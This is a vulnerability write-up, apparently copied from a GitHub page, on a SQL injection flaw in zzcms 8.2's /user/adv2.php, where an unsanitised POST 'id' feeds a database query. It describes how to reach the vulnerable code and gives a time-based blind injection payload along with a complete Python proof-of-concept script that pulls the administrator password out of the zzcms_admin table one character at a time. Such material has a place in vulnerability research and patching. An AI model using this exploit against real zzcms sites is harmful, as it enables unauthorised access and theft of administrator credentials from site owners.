Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
title tags grammar_cjkRuby
adv2.php
新建,模板,小书匠
true

/user/adv2.php

Edition :

zzcms 8.2

Location

/user/adv2.php

Code:

$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");

Rows : 72

Harm

Can get password through SQl injection

Cause the cause

Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0

That is to say, let zzcms_main or zzcms_zh have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST

Then go back and find that need to let action=modify

At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.

poc

import requests
import string
s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {
'UserName':'test2'
}
flag = ''
for i in range(1,40):
 for j in range(33,125):
   data = {
     'id':'0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i,j)
   }
   #print data
   r = s.post(url,data=data,cookies=cookies)
   #print r.text
   sec=r.elapsed.seconds
   #print i,j,sec
   if sec >2:
     flag += chr(j)
     print flag
     break
print flag

Get the administrator password